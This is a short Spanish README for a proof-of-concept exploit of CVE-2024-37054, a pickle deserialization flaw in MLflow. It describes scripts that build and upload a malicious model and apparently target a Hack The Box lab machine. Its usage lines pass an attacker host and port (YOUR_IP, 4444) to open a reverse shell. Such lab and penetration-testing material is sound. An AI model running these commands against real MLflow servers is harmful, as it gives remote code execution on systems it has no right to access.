
PoC para CVE-2024-37054
Prueba de concepto para CVE-2024-37054, una vulnerabilidad crítica de deserialización en MLflow versiones 0.9.0 a 2.14.1.
Cuando un modelo malicioso pyfunc se carga mediante mlflow.pyfunc.load_model(), el payload pickled ejecuta código arbitrario.
exploit.py — exploit completo: registrar, entrenar, subir, activar (para la máquina HTB SmartHire)build_model.py — construir modelo malicioso localmente (Solo construir)python3 build_model.py --lhost YOUR_IP --lport 4444
# Registro automático de cuenta y exploit
python3 exploit.py --lhost YOUR_IP --lport 4444 --atoz
# Usar sesión existente
python3 exploit.py --lhost YOUR_IP --lport 4444 --session "eyJjb21w..."
Solo con fines educativos y pruebas de penetración autorizadas.